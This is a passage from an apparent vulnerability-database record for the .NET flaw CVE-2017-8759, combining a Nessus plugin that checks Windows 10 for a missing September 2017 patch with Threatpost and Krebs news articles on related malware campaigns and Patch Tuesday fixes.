who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8648)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.(CVE-2017-8677)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8712)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707, \n CVE-2017-8712,CVE-2017-8713)\n\n - A security feature bypass vulnerability exists when\n Windows Control Flow Guard mishandles objects in memory.\n (CVE-2017-8716)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. (CVE-2017-8720)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. (CVE-2017-8724)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8724, CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft Edge. (CVE-2017-8739)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user.(CVE-2017-8649, CVE-2017-8660, CVE-2017-8741)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2017-8746)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8747)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8734, CVE-2017-8751)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content. To\n exploit the bypass, an attacker must trick a user into\n either loading a page containing malicious content or\n visiting a malicious website. The attacker could also\n inject the malicious page into either a compromised\n website or an advertisement network. The update\n addresses the bypass by correcting how the Edge CSP\n validates documents. (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8729, CVE-2017-8740,\n CVE-2017-8752, CVE-2017-8753, CVE-2017-8755,\n CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038788/windows-10-update-kb4038788\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fb942e3e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038788.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038788');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038788])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-01-23T05:27:53", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-8759"], "description": "Spam campaigns delivering Zyklon HTTP malware are attempting to exploit three relatively new Microsoft Office vulnerabilities. The attacks are targeting telecommunications, insurance and financial service firms.\n\nAccording to FireEye researchers who identified the campaigns, attackers are attempting to harvest passwords and cryptocurrency wallet data along with recruiting targeted systems for possible future distributed denial of service attacks.\n\nResearchers said attacks begin with spam campaigns delivering malicious ZIP archives that contain one of several type DOC files that ultimately exploit one of the three Microsoft Office vulnerabilities.\n\nThe first vulnerability is a .NET framework bug ([CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>)) patched by Microsoft last October. Targets that open an infected document allow attackers install programs, manipulate data and create new privileged accounts, Microsoft said. In the context of the attack described by FireEye, the infected DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from a stored URL.\n\nThe second vulnerability ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)) is 17-year-old remote code execution bug found in an Office executable called Microsoft Equation Editor. That bug was patched as part of Microsoft\u2019s [Nov. 2017 Patch Tuesday](<https://threatpost.com/microsoft-patches-20-critical-vulnerabilities/128891/>) release. Similar to the previous vulnerability, victims that open a specially crafted DOC automatically download an additional DOC file that contains a PowerShell command used to download the final payload.\n\nMicrosoft doesn\u2019t consider the third flaw, Dynamic Data Exchange (DDE) a vulnerability. Instead, it insists[ that DDE is a product feature](<https://threatpost.com/microsoft-provides-guidance-on-mitigating-dde-attacks/128833/>). However, in November it released guidance to admins as to how to safely disable the feature via new registry settings for Office.\n\nDDE is a protocol that establishes how apps send messages and share data through shared memory. However, attackers have found great success over the past year with macro-based malware exploiting DDE to launch droppers, exploits and malware.\n\nIn the case of the most recent attacks, FireEye said the DDE is also used to deliver a dropper.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/01/06221836/FireEye_Malware_Attack_Vector.png>)\n\n\u201cIn all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded,\u201d researchers wrote. \u201cThe Pause.ps1 script is responsible for resolving the APIs required for code injection.\u201d Ultimately, Pause.ps1 acts as another dropper to deliver the final \u201ccore payload\u201d, the Zyklon malware.\n\n\u201cZyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal,\u201d FireEye wrote. \u201cThe malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software.\u201d\n\nIn this case Zyklon is also configured to cloak communications with its command-and-control via the Tor network. \u201cThe Zyklon executable contains another encrypted file in its .Net resource section named _tor_. This file is decrypted and injected into an instance of InstallUtiil.exe, and functions as a Tor anonymizer,\u201d researchers said.\n\nFrom there the malware can be used by an attacker to carry out a number of different tasks, download new plugins, steal passwords or open a proxy to establish a reverse Socks5 proxy server on infected host machines, researchers said.\n\n\u201cThese types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting,\u201d FireEye said.\n", "modified": "2018-01-17T18:26:01", "published": "2018-01-17T18:26:01", "id": "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "href": "https://threatpost.com/attackers-use-microsoft-office-vulnerabilities-to-spread-zyklon-malware/129503/", "type": "threatpost", "title": "Attackers Use Microsoft Office Vulnerabilities to Spread Zyklon Malware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:23", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119", "CVE-2017-11292", "CVE-2017-8759"], "description": "Adobe today released an [out-of-band Flash Player update](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) addressing a zero-day vulnerability being exploited by a little-known Middle Eastern APT group.\n\nThe group known as Black Oasis was, as recently as this month, using exploits for the flaw to drop FinSpy as a payload. Sold by the controversial German company Gamma International, FinSpy, or FinFisher, is a suite of surveillance and espionage software used to remotely monitor compromised computers. It\u2019s sold to governments and law enforcement around the world, including allegations of sales to oppressive regimes including Egypt, Bahrain, Ethiopia, Uganda and elsewhere.\n\nThe vulnerability, CVE-2017-11292, was privately disclosed Oct. 10 by researchers at Kaspersky Lab, who saw the payload and exploit used against a customer\u2019s network. The attackers spread the exploit via email, embedding the Flash exploit inside an Active X object inside a Word document. Brian Bartholomew, a member of Kaspersky Lab\u2019s Global Research and Analysis Team (GReAT), said retrieval of the payload\u2014which is the latest FinSpy version\u2014is done in multiple stages.\n\nAdobe said Flash version 27.0.0.159 on the desktop, Linux and Google Chrome is affected, as well as version 27.0.0.130 for Edge and Internet Explorer 11 on Windows 10 and 8.1. Users should be sure to be running Flash 27.0.0.170 on all platforms, or heed the advice of many security experts to disable Flash all together. [Flash has been designated for end-of-life](<https://threatpost.com/flashs-final-countdown-has-begun/127475/>).\n\nKaspersky Lab published a [report](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>) today about the zero day on Securelist.com.\n\nBlack Oasis is a bit of an enigma among APT groups. The group has been on Kaspersky Lab\u2019s radar for nearly a year, Bartholomew said, and has had at least five zero-day vulnerabilities and exploits at its disposal since 2015, all of which have been disclosed and patched. There is only one known victim of the Flash zero day patched today, he said.\n\n\u201cThese guys are definitely customers of Gamma. They\u2019ve been using FinSpy for maybe the last two years,\u201d Bartholomew said. \u201cThey were also potentially customers of Hacking Team.\u201d\n\nBlack Oasis appears to have made use of a Hacking Team zero day, [CVE-2015-5119](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/>), prior to the Italian software company being hacked in the summer of 2015 and having many of its attacks publicly dumped online.\n\n\u201cWe know this group was also using that exploit, which we assume was unique to Hacking Team customers,\u201d Bartholomew said. \u201cThey had access to it prior to the hack. Once the hack happened, I have not seen them using Hacking Team at all but they have been using FinSpy pretty regularly since.\u201d\n\nThe APT group\u2019s targets are government and military organizations in the Middle East, countries in North Africa, as well as some in Russia, Ukraine and elsewhere in Europe.\n\n\u201cFinSpy seems to be their payload of choice,\u201d Bartholomew said.\n\nThis is the second zero-day vulnerability in possession of Black Oasis to be patched in the last month. In September, [FireEye disclosed](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) CVE-2017-8759, which was patched by Microsoft and used to spy on an unnamed Russian individual. The vulnerability was described as a SOAP WSDL parser code injection bug spread via Microsoft Office RTF documents. The code injection was used to download and execute script that included PowerShell commands.\n\n\u201cIn the last two months, they\u2019ve burnt two zero days. It\u2019s very evident they have access to a wide swathe of zero days,\u201d Bartholomew said.\n\nZero days can sell for six or seven figures on gray or black markets. They are a source of constant debate between security and privacy experts and governments who buy these attacks for exclusive use as lawful intercept tools in the name of national security or law enforcement purposes.\n\nWhile Black Oasis may be very well resourced, its operational security may be lacking. For example, the group re-used command and control servers burned by the FireEye disclosure in this recent round of attacks using the Flash zero day.\n\n\u201cThey had right around a month to move their infrastructure, but yet they didn\u2019t,\u201d Bartholomew said.\n\nThe emergency update comes less than a week after Patch Tuesday when for the first time in recent memory, Adobe did not publish any security updates for any of its products.\n", "modified": "2017-10-16T11:46:13", "published": "2017-10-16T11:46:13", "id": "THREATPOST:7E6EDF53838EEFD3BEAC32130CE58C38", "href": "https://threatpost.com/adobe-patches-flash-zero-day-exploited-by-black-oasis-apt/128467/", "type": "threatpost", "title": "Adobe Patches Flash Zero Day Exploited by Black Oasis APT", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-0161", "CVE-2017-8628", "CVE-2017-8759"], "description": "An actively exploited zero-day vulnerability tied to Microsoft\u2019s .NET framework is one of 25 critical and 54 important vulnerabilities fixed by Microsoft in its September Patch Tuesday security bulletin.\n\nAccording to Microsoft, the .NET framework vulnerability ([CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>)) allows attackers to \u201ctake control of an affected system.\u201d From there, attackers can install programs and view, change, or delete data, or create new accounts with full user rights.\n\n\u201cTo exploit the vulnerability, an attacker would first need to convince the user to open a malicious document or application,\u201d Microsoft said Tuesday. The bulletin doesn\u2019t give any indication of how widespread the attacks are but says the vulnerability is \u201cimportant\u201d and was found by security firm FireEye.\n\nAccording to FireEye, the vulnerability is actively being distributed with the FINSPY spyware and delivered via malicious Microsoft Office RTF files. Researchers there said the zero day leverages a SOAP WSDL parser code injection vulnerability.\n\n\u201cFireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands,\u201d Genwei Jiang, Ben Read, Tom Bennett, researchers with the firm wrote in a technical analysis of the [vulnerability also posted Tuesday](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>).\n\nThis is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. The first [was found in April](<https://threatpost.com/office-zero-day-delivering-finspy-spyware-to-victims-in-russia/124939/>) and was part of an unidentified state-sponsored attack targeting victims in Russia\n\n\u201cThese exposures demonstrate the significant resources available to \u2018lawful intercept\u2019 companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets,\u201d the firm said.\n\nOn Tuesday, Microsoft also publicly disclosed information pertaining to a patch for vulnerability that is part of a collection [of exploits known as BlueBorne](<https://threatpost.com/wireless-blueborne-attacks-target-billions-of-bluetooth-devices/127921/>), discovered and publicly revealed Tuesday by security firm Armis.\n\nThe BlueBorne-related bug ([CVE-2017-8628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), identified as a Bluetooth driver spoofing vulnerability, could allow an attacker to successfully perform a man-in-the-middle attack and force a user\u2019s computer to unknowingly route traffic through the attacker\u2019s computer, according to Microsoft.\n\nThe prerequisite for the attack includes the target\u2019s device to have Bluetooth enabled and for the adversary to be within proximity of the device. \u201cThe attacker can then initiate a Bluetooth connection to the target computer without the user\u2019s knowledge\u201d and carry out the attack, according to Microsoft.\n\n\u201cYou don\u2019t often see patches to fix issues that depend on physical proximity, but Bluetooth attacks are definitely an exception,\u201d the [Zero Day Initiative\u2019s (ZDI) Dustin Childs said in an analysis of the vulnerability](<https://www.zerodayinitiative.com/blog/2017/9/12/the-september-2017-security-update-review>). \u201cFor the Windows OS, code execution over Bluetooth cannot directly occur with this bug. Still, the MiTM attack is still severe enough to warrant extra attention.\u201d\n\nMicrosoft also patched a critical NetBIOS remote code execution vulnerability ([CVE-2017-0161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0161>)). The flaw exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements, Microsoft said. \u201cTo exploit the vulnerability, an attacker needs to be able to send specially crafted NetBT Session Service packets to an impacted system,\u201d according to the bulletin.\n\nZDI points out that NetBIOS isn\u2019t a routable protocol, so the impact is limited. \u201cThe bad news is that this is practically wormable within a LAN. This could also impact multiple virtual clients if the guest OSes all connect to the same (virtual) LAN,\u201d according to ZDI.\n\nIn total, Microsoft released 81 security patches as part of its September Patch Tuesday impacting Windows, Internet Explorer, Edge, Exchange, .NET Framework, Office and Hyper-V. Twenty-six of the vulnerabilities are critical, 53 important and two are rated moderate in severity. Cutting the numbers even further, 38 of the vulnerabilities impacted Windows and 22 are tied Microsoft\u2019s Edge and IE browsers.\n\n\u201cMany of these vulnerabilities involve the Scripting Engine, which can impact both browsers and Microsoft Office, and should be considered for prioritizing for workstation-type systems that use email and access the internet via a browser,\u201d according [to analysis by](<https://blog.qualys.com/laws-of-vulnerabilities/2017/09/12/september-patch-tuesday-27-critical-vulnerabilities-from-microsoft-plus-critical-adobe-patches>) Jimmy Graham, director of product management, vulnerability management for security firm Qualys.\n", "modified": "2017-09-12T20:00:57", "published": "2017-09-12T15:59:40", "id": "THREATPOST:D1D63DCBBB39C340EEEDB2544F4C7DB3", "href": "https://threatpost.com/microsoft-patches-office-zero-day-vulnerability/127946/", "type": "threatpost", "title": "Microsoft Patches .NET Zero Day Vulnerability in September Update", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "krebs": [{"lastseen": "2017-09-22T08:39:05", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8628", "CVE-2017-8759"], "description": "**Adobe** and **Microsoft** both on Tuesday released patches to plug critical security vulnerabilities in their products. Microsoft's patch bundles fix close to 80 separate security problems in various versions of its **Windows** operating system and related software -- including two vulnerabilities that already are being exploited in active attacks. Adobe's new version of its **Flash Player** software tackles two flaws that malware or attackers could use to seize remote control over vulnerable computers with no help from users.\n\n\n\nOf the two [zero-day flaws](<https://en.wikipedia.org/wiki/Zero-day_\\(computing\\)>) being fixed this week, the one in Microsoft's ubiquitous **.NET Framework** ([CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>)) is perhaps the most concerning. Despite this flaw being actively exploited, it is somehow labeled by Microsoft as \"important\" rather than \"critical\" -- the latter being the most dire designation.\n\nMore than two dozen flaws Microsoft remedied with this patch batch come with a \"critical\" warning, which means they could be exploited without any assistance from Windows users -- save for perhaps browsing to a hacked or malicious Web site.\n\nRegular readers here probably recall that I've often recommended installing .NET updates separately from any remaining Windows updates, mainly because in past instances in which I've experienced problems installing Windows updates, a .NET patch was usually involved.\n\nFor the most part, Microsoft now bundles all security updates together in one big patch ball for regular home users -- no longer letting people choose which patches to install. One exception is patches for the .NET Framework, and I stand by my recommendation to install the patch roll-ups separately, reboot, and then tackle the .NET updates. Your mileage may vary.\n\nAnother vulnerability Microsoft fixed addresses \"[BlueBorne\" ](<https://www.google.com/search?q=BlueBorne&tbm=nws&source=univ&tbo=u&sa=X&ved=0ahUKEwjTxKXsxaLWAhVB34MKHU-hBgUQt8YBCDcoAQ&biw=1536&bih=856>)([CVE-2017-8628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), which is a flaw in the Bluetooth wireless data transmission standard that attackers could use to snarf data from Bluetooth-enabled devices that are physically nearby and with Bluetooth turned on.\n\nFor more on this month's Patch Tuesday from Microsoft, check out Microsoft's [security update guide](<https://portal.msrc.microsoft.com/en-us/security-guidance>), as well as [this blog](<https://www.ivanti.com/blog/september-patch-tuesday-2/>) from **Ivanti** (formerly **Shavlik**).\n\nAdobe's newest Flash version -- _v. 27.0.0.130_ for Windows, Mac and Linx systems -- corrects [two critical bugs in Flash](<https://helpx.adobe.com/security/products/flash-player/apsb17-28.html>). For those of you who still have and want Adobe Flash Player installed in a browser, it\u2019s time to update and/or restart your browser.\n\nWindows users who browse the Web with anything other than Internet Explorer may need to apply the Flash patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).\n\nChrome and IE should auto-install the latest Flash version on browser restart (users may need to manually check for updates and/or restart the browser to get the latest Flash version). Chrome users may need to restart the browser to install or automatically download the latest version. When in doubt, click the vertical three dot icon to the right of the URL bar, select \u201cHelp,\u201d then \u201cAbout Chrome\u201d: If there is an update available, Chrome should install it then. Chrome will replace that three dot icon with an up-arrow inside of a circle when updates are ready to install).\n\nBetter yet, consider removing or at least hobbling Flash Player, which is [a perennial target of malware attacks](<https://krebsonsecurity.com/wp-content/uploads/2017/08/flashflaws-ek.png>). Most sites have moved away from requiring Flash, and Adobe itself [is sunsetting this product](<https://krebsonsecurity.com/2017/08/flash-player-is-dead-long-live-flash-player/>) (albeit not for another long two more years).\n\nWindows users can get rid of Flash through the Add/Remove Programs menu, unless they're using Chrome, which bundles its own version of Flash Player. To get to the Flash settings page, type or cut and paste \"chrome://settings/content\" into the address bar, and click on the Flash result.", "modified": "2017-09-13T16:42:30", "published": "2017-09-13T16:42:30", 